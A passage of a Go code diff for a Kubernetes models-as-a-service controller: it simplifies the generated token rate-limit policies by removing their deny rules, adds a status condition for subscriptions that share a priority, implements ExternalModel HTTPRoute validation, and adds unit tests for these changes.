- if denyCheck := buildMembershipCheck(allGroupNames, allUserNames); denyCheck != "" { - limitsMap[fmt.Sprintf("deny-unsubscribed-%s", modelRef.Name)] = map[string]interface{}{ - "rates": []interface{}{map[string]interface{}{"limit": int64(0), "window": "1m"}}, - "when": []interface{}{map[string]interface{}{"predicate": "!(" + denyCheck + ")"}}, - "counters": []interface{}{map[string]interface{}{"expression": "auth.identity.userid"}}, - } - } - - // Deny invalid header: header present but doesn't match any known subscription. - if len(subNames) > 0 { - denyHeaderWhen := []interface{}{ - map[string]interface{}{"predicate": headerExists}, - } - for _, name := range subNames { - denyHeaderWhen = append(denyHeaderWhen, - map[string]interface{}{"predicate": fmt.Sprintf(`%s != "%s"`, headerCheck, name)}, - ) - } - limitsMap[fmt.Sprintf("deny-invalid-header-%s", modelRef.Name)] = map[string]interface{}{ - "rates": []interface{}{map[string]interface{}{"limit": int64(0), "window": "1m"}}, - "when": denyHeaderWhen, - "counters": []interface{}{map[string]interface{}{"expression": "auth.identity.userid"}}, - } - } + // Sort subscription names for stable annotation value across reconciles + sort.Strings(subNames) // Build the aggregated TokenRateLimitPolicy (one per model, covering all subscriptions) policyName := fmt.Sprintf("maas-trlp-%s", modelRef.Name) @@ -306,7 +231,7 @@ func (r *MaaSSubscriptionReconciler) reconcileTokenRateLimitPolicies(ctx context if err := r.Create(ctx, policy); err != nil { return fmt.Errorf("failed to create TokenRateLimitPolicy for model %s: %w", modelRef.Name, err) } - log.Info("TokenRateLimitPolicy created", "name", policyName, "model", modelRef.Name, "subscriptions", subNames) + log.Info("TokenRateLimitPolicy created", "name", policyName, "model", modelRef.Name, "subscriptionCount", len(subNames), "subscriptions", subNames) } else if err != nil { return fmt.Errorf("failed to get existing TokenRateLimitPolicy: %w", err) } else { @@ -339,12 +264,12 
@@ func (r *MaaSSubscriptionReconciler) reconcileTokenRateLimitPolicies(ctx context } if equality.Semantic.DeepEqual(snapshot.Object, existing.Object) { - log.Info("TokenRateLimitPolicy unchanged, skipping update", "name", policyName, "model", modelRef.Namespace+"/"+modelRef.Name) + log.Info("TokenRateLimitPolicy unchanged, skipping update", "name", policyName, "model", modelRef.Namespace+"/"+modelRef.Name, "subscriptionCount", len(subNames)) } else { if err := r.Update(ctx, existing); err != nil { return fmt.Errorf("failed to update TokenRateLimitPolicy for model %s/%s: %w", modelRef.Namespace, modelRef.Name, err) } - log.Info("TokenRateLimitPolicy updated", "name", policyName, "model", modelRef.Namespace+"/"+modelRef.Name, "subscriptions", subNames) + log.Info("TokenRateLimitPolicy updated", "name", policyName, "model", modelRef.Namespace+"/"+modelRef.Name, "subscriptionCount", len(subNames), "subscriptions", subNames) } } } @@ -404,6 +329,15 @@ func (r *MaaSSubscriptionReconciler) handleDeletion(ctx context.Context, log log } func (r *MaaSSubscriptionReconciler) updateStatus(ctx context.Context, subscription *maasv1alpha1.MaaSSubscription, phase, message string, statusSnapshot *maasv1alpha1.MaaSSubscriptionStatus) { + // Status-only updates do not bump metadata.generation, so this reconcile may not re-queue. + // Merge SpecPriorityDuplicate from the API server so we do not clobber the async duplicate-priority scan. 
+ latest := &maasv1alpha1.MaaSSubscription{} + if err := r.Get(ctx, client.ObjectKeyFromObject(subscription), latest); err == nil { + if dup := apimeta.FindStatusCondition(latest.Status.Conditions, ConditionSpecPriorityDuplicate); dup != nil { + apimeta.SetStatusCondition(&subscription.Status.Conditions, *dup) + } + } + subscription.Status.Phase = phase status := metav1.ConditionTrue @@ -431,6 +365,108 @@ func (r *MaaSSubscriptionReconciler) updateStatus(ctx context.Context, subscript } } +// scanForDuplicatePriority lists live MaaSSubscriptions and sets SpecPriorityDuplicate +// on each. Triggered on create, delete, or when spec.priority changes (see SetupWithManager). +func (r *MaaSSubscriptionReconciler) scanForDuplicatePriority(ctx context.Context) { + log := logr.FromContextOrDiscard(ctx).WithName("MaaSSubscriptionDuplicatePriority") + var list maasv1alpha1.MaaSSubscriptionList + if err := r.List(ctx, &list); err != nil { + log.Error(err, "failed to list MaaSSubscriptions for duplicate priority scan") + return + } + + liveIdx := make([]int, 0, len(list.Items)) + for i := range list.Items { + if list.Items[i].DeletionTimestamp.IsZero() { + liveIdx = append(liveIdx, i) + } + } + + byPriority := make(map[int32][]string) + for _, i := range liveIdx { + s := &list.Items[i] + p := s.Spec.Priority + k := s.Namespace + "/" + s.Name + byPriority[p] = append(byPriority[p], k) + } + for p := range byPriority { + sort.Strings(byPriority[p]) + } + + var duplicateDetails []string + for p, keys := range byPriority { + if len(keys) > 1 { + duplicateDetails = append(duplicateDetails, fmt.Sprintf("priority=%d:%v", p, keys)) + } + } + sort.Strings(duplicateDetails) + if len(duplicateDetails) > 0 { + log.Info("duplicate MaaSSubscription spec.priority groups — resolve ties for predictable API key mint / subscription selection", + "groups", duplicateDetails) + } + + for _, i := range liveIdx { + s := &list.Items[i] + selfKey := s.Namespace + "/" + s.Name + p := s.Spec.Priority + 
keys := byPriority[p] + var peers []string + for _, k := range keys { + if k != selfKey { + peers = append(peers, k) + } + } + + latest := &maasv1alpha1.MaaSSubscription{} + if err := r.Get(ctx, types.NamespacedName{Namespace: s.Namespace, Name: s.Name}, latest); err != nil { + log.Error(err, "failed to get MaaSSubscription for duplicate priority status patch", "subscription", selfKey) + continue + } + if !latest.DeletionTimestamp.IsZero() { + continue + } + + gen := latest.GetGeneration() + var desired metav1.Condition + if len(peers) == 0 { + desired = metav1.Condition{ + Type: ConditionSpecPriorityDuplicate, + Status: metav1.ConditionFalse, + Reason: "NoDuplicatePeers", + Message: "", + ObservedGeneration: gen, + } + } else { + desired = metav1.Condition{ + Type: ConditionSpecPriorityDuplicate, + Status: metav1.ConditionTrue, + Reason: "SharedPriority", + Message: fmt.Sprintf("spec.priority %d is shared with: %s", p, strings.Join(peers, ", ")), + ObservedGeneration: gen, + } + } + + cur := apimeta.FindStatusCondition(latest.Status.Conditions, ConditionSpecPriorityDuplicate) + if conditionsSemanticallyEqual(cur, &desired) { + continue + } + apimeta.SetStatusCondition(&latest.Status.Conditions, desired) + if err := r.Status().Update(ctx, latest); err != nil { + log.Error(err, "failed to update SpecPriorityDuplicate status", "subscription", selfKey) + } + } +} + +func conditionsSemanticallyEqual(a, b *metav1.Condition) bool { + if a == nil && b == nil { + return true + } + if a == nil || b == nil { + return false + } + return a.Type == b.Type && a.Status == b.Status && a.Reason == b.Reason && a.Message == b.Message && a.ObservedGeneration == b.ObservedGeneration +} + // SetupWithManager sets up the controller with the Manager. func (r *MaaSSubscriptionReconciler) SetupWithManager(mgr ctrl.Manager) error { // Watch generated TokenRateLimitPolicies so we re-reconcile when someone manually edits them. 
@@ -442,6 +478,13 @@ func (r *MaaSSubscriptionReconciler) SetupWithManager(mgr ctrl.Manager) error { predicate.GenerationChangedPredicate{}, predicate.Funcs{UpdateFunc: deletionTimestampSet}, ))). + // Full scan of duplicate spec.priority on create, delete, or priority-only spec update. + // Does not enqueue reconciles; only patches status conditions on all subscriptions. + Watches( + &maasv1alpha1.MaaSSubscription{}, + duplicatePriorityScanHandler(r), + builder.WithPredicates(duplicatePriorityScanPredicate()), + ). // Watch HTTPRoutes so we re-reconcile when KServe creates/updates a route // (fixes race condition where MaaSSubscription is created before HTTPRoute exists). Watches(&gatewayapiv1.HTTPRoute{}, handler.EnqueueRequestsFromMapFunc( @@ -458,6 +501,37 @@ func (r *MaaSSubscriptionReconciler) SetupWithManager(mgr ctrl.Manager) error { Complete(r) } +// duplicatePriorityScanHandler runs a full duplicate-priority scan without enqueuing reconciles. +func duplicatePriorityScanHandler(r *MaaSSubscriptionReconciler) handler.EventHandler { + return handler.Funcs{ + CreateFunc: func(ctx context.Context, _ event.CreateEvent, _ workqueue.TypedRateLimitingInterface[reconcile.Request]) { + r.scanForDuplicatePriority(ctx) + }, + UpdateFunc: func(ctx context.Context, _ event.UpdateEvent, _ workqueue.TypedRateLimitingInterface[reconcile.Request]) { + r.scanForDuplicatePriority(ctx) + }, + DeleteFunc: func(ctx context.Context, _ event.DeleteEvent, _ workqueue.TypedRateLimitingInterface[reconcile.Request]) { + r.scanForDuplicatePriority(ctx) + }, + } +} + +// duplicatePriorityScanPredicate limits full scans to subscription lifecycle / priority changes. 
+func duplicatePriorityScanPredicate() predicate.Predicate { + return predicate.Funcs{ + CreateFunc: func(event.CreateEvent) bool { return true }, + UpdateFunc: func(e event.UpdateEvent) bool { + oldSub, ok1 := e.ObjectOld.(*maasv1alpha1.MaaSSubscription) + newSub, ok2 := e.ObjectNew.(*maasv1alpha1.MaaSSubscription) + if !ok1 || !ok2 { + return false + } + return oldSub.Spec.Priority != newSub.Spec.Priority + }, + DeleteFunc: func(event.DeleteEvent) bool { return true }, + } +} + // mapGeneratedTRLPToParent maps a generated TokenRateLimitPolicy back to any // MaaSSubscription that references the same model. The TokenRateLimitPolicy is per-model (aggregated), // so we use the model label to find a subscription to trigger reconciliation. diff --git a/maas-controller/pkg/controller/maas/maassubscription_controller_test.go b/maas-controller/pkg/controller/maas/maassubscription_controller_test.go index 53ad59a72..8f7e83c16 100644 --- a/maas-controller/pkg/controller/maas/maassubscription_controller_test.go +++ b/maas-controller/pkg/controller/maas/maassubscription_controller_test.go @@ -18,10 +18,13 @@ package maas import ( "context" + "fmt" + "strings" "testing" maasv1alpha1 "github.com/opendatahub-io/models-as-a-service/maas-controller/api/maas/v1alpha1" apierrors "k8s.io/apimachinery/pkg/api/errors" + apimeta "k8s.io/apimachinery/pkg/api/meta" metav1 "k8s.io/apimachinery/pkg/apis/meta/v1" "k8s.io/apimachinery/pkg/apis/meta/v1/unstructured" "k8s.io/apimachinery/pkg/runtime/schema" @@ -198,6 +201,74 @@ func TestMaaSSubscriptionReconciler_DuplicateReconciliation(t *testing.T) { } } +// TestMaaSSubscriptionReconciler_SpecPriorityDuplicateCondition checks scanForDuplicatePriority in one pass: +// sub-a and sub-b share spec.priority; sub-c has a unique priority. 
+func TestMaaSSubscriptionReconciler_SpecPriorityDuplicateCondition(t *testing.T) { + const ( + modelName = "llm" + namespace = "default" + httpRouteName = "maas-model-" + modelName + ) + + model := newMaaSModelRef(modelName, namespace, "ExternalModel", modelName) + route := newHTTPRoute(httpRouteName, namespace) + subA := newMaaSSubscription("sub-a", namespace, "team-a", modelName, 100) + subA.Spec.Priority = 5 + subB := newMaaSSubscription("sub-b", namespace, "team-b", modelName, 200) + subB.Spec.Priority = 5 + subC := newMaaSSubscription("sub-c", namespace, "team-c", modelName, 300) + subC.Spec.Priority = 10 + + c := fake.NewClientBuilder(). + WithScheme(scheme). + WithRESTMapper(testRESTMapper()). + WithObjects(model, route, subA, subB, subC). + WithStatusSubresource(&maasv1alpha1.MaaSSubscription{}). + Build() + + r := &MaaSSubscriptionReconciler{Client: c, Scheme: scheme} + ctx := context.Background() + + if _, err := r.Reconcile(ctx, ctrl.Request{NamespacedName: types.NamespacedName{Name: "sub-a", Namespace: namespace}}); err != nil { + t.Fatalf("Reconcile sub-a: %v", err) + } + r.scanForDuplicatePriority(ctx) + + assertSpecPriorityDuplicate := func(t *testing.T, subName string, wantTrue bool, mustContainPeer string) { + t.Helper() + var got maasv1alpha1.MaaSSubscription + if err := c.Get(ctx, types.NamespacedName{Name: subName, Namespace: namespace}, &got); err != nil { + t.Fatalf("Get %s: %v", subName, err) + } + cond := apimeta.FindStatusCondition(got.Status.Conditions, ConditionSpecPriorityDuplicate) + if cond == nil { + t.Fatalf("expected SpecPriorityDuplicate condition on %s", subName) + } + if wantTrue { + if cond.Status != metav1.ConditionTrue { + t.Fatalf("%s: SpecPriorityDuplicate.Status = %s, want True", subName, cond.Status) + } + if mustContainPeer != "" && !strings.Contains(cond.Message, mustContainPeer) { + t.Fatalf("%s: message should mention peer %q, got %q", subName, mustContainPeer, cond.Message) + } + } else { + if cond.Status != 
metav1.ConditionFalse { + t.Fatalf("%s: SpecPriorityDuplicate.Status = %s, want False", subName, cond.Status) + } + } + } + + t.Run("sub-a shares priority with sub-b", func(t *testing.T) { + assertSpecPriorityDuplicate(t, "sub-a", true, namespace+"/sub-b") + }) + t.Run("sub-b shares priority with sub-a", func(t *testing.T) { + assertSpecPriorityDuplicate(t, "sub-b", true, namespace+"/sub-a") + }) + t.Run("sub-c has unique priority", func(t *testing.T) { + assertSpecPriorityDuplicate(t, "sub-c", false, "") + }) +} + // TestMaaSSubscriptionReconciler_DeleteAnnotation verifies that the Reconcile deletion // path respects the opt-out annotation: a TokenRateLimitPolicy with // opendatahub.io/managed=false must not be deleted when the parent MaaSSubscription is removed. @@ -273,6 +344,7 @@ func TestMaaSSubscriptionReconciler_DeleteAnnotation(t *testing.T) { }) } } + // TestMaaSSubscriptionReconciler_MultipleSubscriptionsDeletion verifies that when multiple // MaaSSubscriptions reference the same model, deleting one does not delete the aggregated // TokenRateLimitPolicy, but deleting the last one does. @@ -397,3 +469,230 @@ func TestMaaSSubscriptionReconciler_MultipleSubscriptionsDeletion(t *testing.T) t.Errorf("TokenRateLimitPolicy should be deleted after deleting last parent subscription, but got error: %v", err) } } + +// TestMaaSSubscriptionReconciler_SimplifiedTRLP verifies the TRLP no longer contains +// membership checks, header validation, or deny rules. It should trust auth.identity.selected_subscription. 
+func TestMaaSSubscriptionReconciler_SimplifiedTRLP(t *testing.T) { + const ( + modelName = "llm" + namespace = "default" + httpRouteName = "maas-model-" + modelName + trlpName = "maas-trlp-" + modelName + maasSubName = "sub-a" + ) + + model := newMaaSModelRef(modelName, namespace, "ExternalModel", modelName) + route := newHTTPRoute(httpRouteName, namespace) + maasSub := newMaaSSubscription(maasSubName, namespace, "team-a", modelName, 100) + + c := fake.NewClientBuilder(). + WithScheme(scheme). + WithRESTMapper(testRESTMapper()). + WithObjects(model, route, maasSub). + WithStatusSubresource(&maasv1alpha1.MaaSSubscription{}). + Build() + + r := &MaaSSubscriptionReconciler{Client: c, Scheme: scheme} + req := ctrl.Request{NamespacedName: types.NamespacedName{Name: maasSubName, Namespace: namespace}} + if _, err := r.Reconcile(context.Background(), req); err != nil { + t.Fatalf("Reconcile: unexpected error: %v", err) + } + + trlp := &unstructured.Unstructured{} + trlp.SetGroupVersionKind(schema.GroupVersionKind{Group: "kuadrant.io", Version: "v1alpha1", Kind: "TokenRateLimitPolicy"}) + if err := c.Get(context.Background(), types.NamespacedName{Name: trlpName, Namespace: namespace}, trlp); err != nil { + t.Fatalf("Get TokenRateLimitPolicy %q: %v", trlpName, err) + } + + limitsMap, found, err := unstructured.NestedMap(trlp.Object, "spec", "limits") + if err != nil || !found { + t.Fatalf("spec.limits not found: found=%v err=%v", found, err) + } + + // Should have exactly 1 limit entry (no deny rules) + if len(limitsMap) != 1 { + t.Errorf("expected 1 limit entry, got %d: %v", len(limitsMap), limitsMap) + } + + // Check the limit entry key (now includes namespace: "namespace-name-model-tokens") + expectedKey := namespace + "-" + maasSubName + "-" + modelName + "-tokens" + limitEntry, ok := limitsMap[expectedKey] + if !ok { + t.Fatalf("expected limit entry %q not found, got keys: %v", expectedKey, getKeys(limitsMap)) + } + + // Verify it has a single, simple predicate + 
limitMap, ok := limitEntry.(map[string]interface{}) + if !ok { + t.Fatalf("limitEntry is not map[string]interface{}: %T", limitEntry) + } + whenSlice, found, err := unstructured.NestedSlice(limitMap, "when") + if err != nil || !found { + t.Fatalf("when predicates not found: found=%v err=%v", found, err) + } + + if len(whenSlice) != 1 { + t.Errorf("expected 1 when predicate, got %d", len(whenSlice)) + } + + predMap, ok := whenSlice[0].(map[string]interface{}) + if !ok { + t.Fatalf("whenSlice[0] is not map[string]interface{}: %T", whenSlice[0]) + } + pred, ok := predMap["predicate"].(string) + if !ok { + t.Fatalf("predicate not a string: %T", predMap["predicate"]) + } + + // Predicate now uses model-scoped key: namespace/name@modelNamespace/modelName + expected := fmt.Sprintf(`auth.identity.selected_subscription_key == "%s/%s@%s/%s"`, namespace, maasSubName, namespace, modelName) + if pred != expected { + t.Errorf("predicate = %q, want %q", pred, expected) + } + + // Verify no membership/header checks in predicate + if strings.Contains(pred, "groups_str") || strings.Contains(pred, "request.headers") || strings.Contains(pred, "exists(") { + t.Errorf("predicate should not contain membership/header checks: %s", pred) + } + + // Verify no deny rules + for key := range limitsMap { + if strings.Contains(key, "deny-") { + t.Errorf("found deny rule %q, expected none", key) + } + } +} + +// TestMaaSSubscriptionReconciler_MultipleSubscriptionsSimplified verifies that +// multiple subscriptions generate simple predicates without exclusion logic. 
+func TestMaaSSubscriptionReconciler_MultipleSubscriptionsSimplified(t *testing.T) { + const ( + modelName = "llm" + namespace = "default" + httpRouteName = "maas-model-" + modelName + trlpName = "maas-trlp-" + modelName + ) + + model := newMaaSModelRef(modelName, namespace, "ExternalModel", modelName) + route := newHTTPRoute(httpRouteName, namespace) + subA := newMaaSSubscription("sub-a", namespace, "team-a", modelName, 100) + subB := newMaaSSubscription("sub-b", namespace, "team-b", modelName, 200) + + c := fake.NewClientBuilder(). + WithScheme(scheme). + WithRESTMapper(testRESTMapper()). + WithObjects(model, route, subA, subB). + WithStatusSubresource(&maasv1alpha1.MaaSSubscription{}). + Build() + + r := &MaaSSubscriptionReconciler{Client: c, Scheme: scheme} + + // Reconcile both subscriptions + reqA := ctrl.Request{NamespacedName: types.NamespacedName{Name: "sub-a", Namespace: namespace}} + if _, err := r.Reconcile(context.Background(), reqA); err != nil { + t.Fatalf("Reconcile sub-a: %v", err) + } + + trlp := &unstructured.Unstructured{} + trlp.SetGroupVersionKind(schema.GroupVersionKind{Group: "kuadrant.io", Version: "v1alpha1", Kind: "TokenRateLimitPolicy"}) + if err := c.Get(context.Background(), types.NamespacedName{Name: trlpName, Namespace: namespace}, trlp); err != nil { + t.Fatalf("Get TokenRateLimitPolicy: %v", err) + } + + limitsMap, found, err := unstructured.NestedMap(trlp.Object, "spec", "limits") + if err != nil || !found { + t.Fatalf("spec.limits not found: found=%v err=%v", found, err) + } + + // Should have exactly 2 limit entries (one per subscription, no deny rules) + if len(limitsMap) != 2 { + t.Errorf("expected 2 limit entries, got %d: %v", len(limitsMap), getKeys(limitsMap)) + } + + // Verify sub-a limit entry (now includes namespace in key) + subAKey := namespace + "-sub-a-" + modelName + "-tokens" + if limitA, ok := limitsMap[subAKey]; ok { + limitAMap, ok := limitA.(map[string]interface{}) + if !ok { + t.Fatalf("sub-a limitEntry is not 
map[string]interface{}: %T", limitA) + } + whenSlice, found, err := unstructured.NestedSlice(limitAMap, "when") + if err != nil || !found { + t.Fatalf("sub-a when predicates not found: found=%v err=%v", found, err) + } + if len(whenSlice) != 1 { + t.Errorf("sub-a: expected 1 when predicate, got %d", len(whenSlice)) + } + predMap, ok := whenSlice[0].(map[string]interface{}) + if !ok { + t.Fatalf("sub-a whenSlice[0] is not map[string]interface{}: %T", whenSlice[0]) + } + pred, ok := predMap["predicate"].(string) + if !ok { + t.Fatalf("sub-a predicate not a string: %T", predMap["predicate"]) + } + // Predicate now uses model-scoped key: namespace/name@modelNamespace/modelName + expected := fmt.Sprintf(`auth.identity.selected_subscription_key == "%s/sub-a@%s/%s"`, namespace, namespace, modelName) + if pred != expected { + t.Errorf("sub-a predicate = %q, want %q", pred, expected) + } + // No exclusion logic (no reference to sub-b or team-b) + if strings.Contains(pred, "sub-b") || strings.Contains(pred, "team-b") { + t.Errorf("sub-a predicate should not reference sub-b: %s", pred) + } + } else { + t.Errorf("sub-a limit entry not found, got keys: %v", getKeys(limitsMap)) + } + + // Verify sub-b limit entry (now includes namespace in key) + subBKey := namespace + "-sub-b-" + modelName + "-tokens" + if limitB, ok := limitsMap[subBKey]; ok { + limitBMap, ok := limitB.(map[string]interface{}) + if !ok { + t.Fatalf("sub-b limitEntry is not map[string]interface{}: %T", limitB) + } + whenSlice, found, err := unstructured.NestedSlice(limitBMap, "when") + if err != nil || !found { + t.Fatalf("sub-b when predicates not found: found=%v err=%v", found, err) + } + if len(whenSlice) != 1 { + t.Errorf("sub-b: expected 1 when predicate, got %d", len(whenSlice)) + } + predMap, ok := whenSlice[0].(map[string]interface{}) + if !ok { + t.Fatalf("sub-b whenSlice[0] is not map[string]interface{}: %T", whenSlice[0]) + } + pred, ok := predMap["predicate"].(string) + if !ok { + t.Fatalf("sub-b 
predicate not a string: %T", predMap["predicate"]) + } + // Predicate now uses model-scoped key: namespace/name@modelNamespace/modelName + expected := fmt.Sprintf(`auth.identity.selected_subscription_key == "%s/sub-b@%s/%s"`, namespace, namespace, modelName) + if pred != expected { + t.Errorf("sub-b predicate = %q, want %q", pred, expected) + } + // No exclusion logic (no reference to sub-a or team-a) + if strings.Contains(pred, "sub-a") || strings.Contains(pred, "team-a") { + t.Errorf("sub-b predicate should not reference sub-a: %s", pred) + } + } else { + t.Errorf("sub-b limit entry not found, got keys: %v", getKeys(limitsMap)) + } + + // Verify no deny rules + for key := range limitsMap { + if strings.Contains(key, "deny-") { + t.Errorf("found deny rule %q, expected none", key) + } + } +} + + +// Helper to get map keys +func getKeys(m map[string]interface{}) []string { + keys := make([]string, 0, len(m)) + for k := range m { + keys = append(keys, k) + } + return keys +} diff --git a/maas-controller/pkg/controller/maas/providers.go b/maas-controller/pkg/controller/maas/providers.go index 333bfa6fa..9cb9dc2d8 100644 --- a/maas-controller/pkg/controller/maas/providers.go +++ b/maas-controller/pkg/controller/maas/providers.go @@ -32,6 +32,10 @@ import ( // ErrKindNotImplemented indicates the model kind is recognized but not implemented (e.g. ExternalModel stub). var ErrKindNotImplemented = errors.New("model kind not implemented") +// ErrHTTPRouteNotFound indicates the HTTPRoute for a model does not exist yet (normal during startup). +// Controller should set status to Pending and requeue to retry. +var ErrHTTPRouteNotFound = errors.New("HTTPRoute not found yet") + // RouteResolver returns the HTTPRoute name and namespace for a MaaSModelRef. // Used by findHTTPRouteForModel and by AuthPolicy/Subscription controllers to attach policies. 
type RouteResolver interface { @@ -132,7 +136,7 @@ func getHTTPRoute(ctx context.Context, c client.Reader, name, ns string) (*gatew err := c.Get(ctx, types.NamespacedName{Name: name, Namespace: ns}, route) if err != nil { if apierrors.IsNotFound(err) { - return nil, fmt.Errorf("HTTPRoute %s/%s not found for model", ns, name) + return nil, fmt.Errorf("%w: HTTPRoute %s/%s", ErrHTTPRouteNotFound, ns, name) } return nil, fmt.Errorf("failed to get HTTPRoute %s/%s: %w", ns, name, err) } diff --git a/maas-controller/pkg/controller/maas/providers_external.go b/maas-controller/pkg/controller/maas/providers_external.go index c890e48ae..5827a27be 100644 --- a/maas-controller/pkg/controller/maas/providers_external.go +++ b/maas-controller/pkg/controller/maas/providers_external.go @@ -22,66 +22,207 @@ import ( "github.com/go-logr/logr" maasv1alpha1 "github.com/opendatahub-io/models-as-a-service/maas-controller/api/maas/v1alpha1" + apierrors "k8s.io/apimachinery/pkg/api/errors" + metav1 "k8s.io/apimachinery/pkg/apis/meta/v1" + "k8s.io/apimachinery/pkg/types" "sigs.k8s.io/controller-runtime/pkg/client" + gatewayapiv1 "sigs.k8s.io/gateway-api/apis/v1" ) +// routeConditionProgrammed is the "Programmed" condition type for route parent status. +// gateway-api v1.2.1 only defines this as a Gateway condition (GatewayConditionProgrammed), +// but gateway controllers commonly set it on route parent status as well. +const routeConditionProgrammed = "Programmed" + // externalModelHandler implements BackendHandler for kind "ExternalModel". -// Until the logic below is implemented, ReconcileRoute and Status return ErrKindNotImplemented, -// which causes the controller to set status Phase=Failed and Condition Reason=Unsupported. type externalModelHandler struct { r *MaaSModelRefReconciler } // ReconcileRoute validates the user-supplied HTTPRoute for an external model and populates status. 
-// -// Current behaviour: returns ErrKindNotImplemented so the controller marks the model as Unsupported. -// -// To implement: Users supply the HTTPRoute (the controller does not create it). ReconcileRoute should: -// 1. Resolve the HTTPRoute name/namespace from model spec (e.g. ModelReference or new ExternalModel-specific fields). -// 2. Get the HTTPRoute and validate it references the configured gateway (r.gatewayName() / r.gatewayNamespace()). -// 3. Populate model.Status with HTTPRouteName, HTTPRouteNamespace, HTTPRouteGatewayName, -// HTTPRouteGatewayNamespace, and HTTPRouteHostnames so Status() and discovery can derive the endpoint. -// 4. Return nil on success; the controller will then call Status(). +// Users supply the HTTPRoute (the controller does not create it). The HTTPRoute naming convention +// is "maas-model-" in the model's namespace. func (h *externalModelHandler) ReconcileRoute(ctx context.Context, log logr.Logger, model *maasv1alpha1.MaaSModelRef) error { - return fmt.Errorf("%w: ExternalModel", ErrKindNotImplemented) + // Fetch the referenced ExternalModel CR to get provider configuration + externalModel := &maasv1alpha1.ExternalModel{} + externalModelKey := types.NamespacedName{ + Name: model.Spec.ModelRef.Name, + Namespace: model.Namespace, + } + if err := h.r.Get(ctx, externalModelKey, externalModel); err != nil { + if apierrors.IsNotFound(err) { + return fmt.Errorf("ExternalModel %s not found in namespace %s", model.Spec.ModelRef.Name, model.Namespace) + } + return fmt.Errorf("failed to get ExternalModel %s: %w", model.Spec.ModelRef.Name, err) + } + + routeName := fmt.Sprintf("maas-model-%s", model.Name) + routeNS := model.Namespace + + route := &gatewayapiv1.HTTPRoute{} + key := client.ObjectKey{Name: routeName, Namespace: routeNS} + if err := h.r.Get(ctx, key, route); err != nil { + if apierrors.IsNotFound(err) { + log.Info("HTTPRoute not found for ExternalModel, waiting for user to create it", + "routeName", routeName, "namespace", 
routeNS, "model", model.Name) + // Clear stale route status so the model stays NotReady without requeue hot-looping + model.Status.Endpoint = "" + model.Status.HTTPRouteName = "" + model.Status.HTTPRouteNamespace = "" + model.Status.HTTPRouteGatewayName = "" + model.Status.HTTPRouteGatewayNamespace = "" + model.Status.HTTPRouteHostnames = nil + return nil + } + return fmt.Errorf("failed to get HTTPRoute %s/%s: %w", routeNS, routeName, err) + } + + expectedGatewayName := h.r.gatewayName() + expectedGatewayNamespace := h.r.gatewayNamespace() + gatewayFound := false + gatewayAccepted := false + var gatewayName string + var gatewayNamespace string + + for _, parentRef := range route.Spec.ParentRefs { + refName := string(parentRef.Name) + refNS := routeNS + if parentRef.Namespace != nil { + refNS = string(*parentRef.Namespace) + } + if refName == expectedGatewayName && refNS == expectedGatewayNamespace { + gatewayFound = true + gatewayName = refName + gatewayNamespace = refNS + break + } + if gatewayName == "" { + gatewayName = refName + gatewayNamespace = refNS + } + } + + // Verify the gateway has accepted and programmed the route via status conditions + if gatewayFound { + for _, parent := range route.Status.RouteStatus.Parents { + pName := string(parent.ParentRef.Name) + pNS := routeNS + if parent.ParentRef.Namespace != nil { + pNS = string(*parent.ParentRef.Namespace) + } + if pName == expectedGatewayName && pNS == expectedGatewayNamespace { + accepted := false + programmed := false + for _, cond := range parent.Conditions { + if cond.Type == string(gatewayapiv1.RouteConditionAccepted) && cond.Status == metav1.ConditionTrue { + accepted = true + } + if cond.Type == routeConditionProgrammed && cond.Status == metav1.ConditionTrue { + programmed = true + } + } + gatewayAccepted = accepted && programmed + break + } + } + } + + var hostnames []string + for _, hostname := range route.Spec.Hostnames { + hostnames = append(hostnames, string(hostname)) + } + + if 
!gatewayFound { + log.Error(nil, "HTTPRoute does not reference configured gateway", + "routeName", routeName, "routeNamespace", routeNS, + "expectedGateway", fmt.Sprintf("%s/%s", expectedGatewayNamespace, expectedGatewayName), + "foundGateway", fmt.Sprintf("%s/%s", gatewayNamespace, gatewayName)) + return fmt.Errorf("HTTPRoute %s/%s does not reference gateway %s/%s (found: %s/%s)", + routeNS, routeName, expectedGatewayNamespace, expectedGatewayName, gatewayNamespace, gatewayName) + } + + if !gatewayAccepted { + log.Info("HTTPRoute references correct gateway but not yet accepted and programmed", + "routeName", routeName, "namespace", routeNS, "model", model.Name) + model.Status.HTTPRouteName = routeName + model.Status.HTTPRouteNamespace = routeNS + // Don't set gateway/hostname fields until route is accepted + return nil + } + + model.Status.HTTPRouteName = routeName + model.Status.HTTPRouteNamespace = routeNS + model.Status.HTTPRouteGatewayName = gatewayName + model.Status.HTTPRouteGatewayNamespace = gatewayNamespace + model.Status.HTTPRouteHostnames = hostnames + + log.Info("HTTPRoute validated for ExternalModel", + "routeName", routeName, "namespace", routeNS, "model", model.Name, + "externalModel", externalModel.Name, "provider", externalModel.Spec.Provider, + "gateway", fmt.Sprintf("%s/%s", gatewayNamespace, gatewayName), "hostnames", hostnames) + + return nil } // Status returns the model endpoint URL and whether the model is ready. -// -// Current behaviour: returns ErrKindNotImplemented so the controller marks the model as Unsupported. -// -// To implement: -// 1. After ReconcileRoute has validated the user-supplied HTTPRoute and set status, read the route or gateway (e.g. -// r.Get(ctx, gatewayKey, gateway)) to get a hostname or address. -// 2. Build the endpoint URL (e.g. "https:///"). Prefer model.Status.HTTPRouteHostnames -// if ReconcileRoute set it from the HTTPRoute. -// 3. Optionally probe the external endpoint (HTTP GET/HEAD) to determine ready. 
If you do not -// probe, you can return (endpoint, true, nil) once the HTTPRoute is in place. -// 4. Return (endpoint, ready, nil). The controller will set model.Status.Endpoint and Phase -// (Ready or Pending) from this. +// ExternalModel is considered ready once the HTTPRoute is validated (no backend readiness probe). func (h *externalModelHandler) Status(ctx context.Context, log logr.Logger, model *maasv1alpha1.MaaSModelRef) (endpoint string, ready bool, err error) { - return "", false, fmt.Errorf("%w: ExternalModel", ErrKindNotImplemented) + if model.Status.HTTPRouteName == "" || model.Status.HTTPRouteGatewayName == "" { + return "", false, nil + } + + endpoint, err = h.GetModelEndpoint(ctx, log, model) + if err != nil { + return "", false, err + } + + return endpoint, true, nil } -// GetModelEndpoint returns the endpoint URL for ExternalModel. When implemented, use your own logic -// (e.g. spec.endpoint or from your HTTPRoute); do not assume the same gateway hostname + path as llmisvc. +// GetModelEndpoint returns the endpoint URL for the ExternalModel. +// Follows the same resolution order as llmisvc: HTTPRoute hostnames > gateway listeners > gateway addresses. 
